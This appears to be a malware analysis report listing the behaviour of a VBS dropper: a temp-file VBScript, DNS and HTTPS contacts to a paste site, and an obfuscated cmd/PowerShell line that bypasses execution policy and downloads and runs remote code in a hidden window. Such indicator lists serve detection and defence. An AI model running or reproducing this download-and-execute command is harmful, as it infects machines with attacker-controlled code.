Technical information
- https://throwbin.in/tz4a1j
- %TEMP%\a582.tmp\code.vbs
- %TEMP%\a582.tmp\code.vbs
- 'th##wbin.in':443
- 'th##wbin.in':443
- DNS ASK th##wbin.in
- '<SYSTEM32>\cscript.exe' %TEMP%\A582.tmp\Code.vbs
- '<SYSTEM32>\cmd.exe' /C POWERSHELL.EXE -^e^x^e^c^ ^B^y^p^a^s^s^ -^C^ ^I^E^X^(^N^e^w^-O^b^j^ec^t ^N^et.W^eb^cl^ie^nt^).D^o^wn^l^oa^dS^t^ri^n^g(^'https://throwbin.in/tz4a1j'^)' (with hidden window)
- '<SYSTEM32>\cmd.exe' /C POWERSHELL.EXE -^e^x^e^c^ ^B^y^p^a^s^s^ -^C^ ^I^E^X^(^N^e^w^-O^b^j^ec^t ^N^et.W^eb^cl^ie^nt^).D^o^wn^l^oa^dS^t^ri^n^g(^'https://throwbin.in/tz4a1j'^)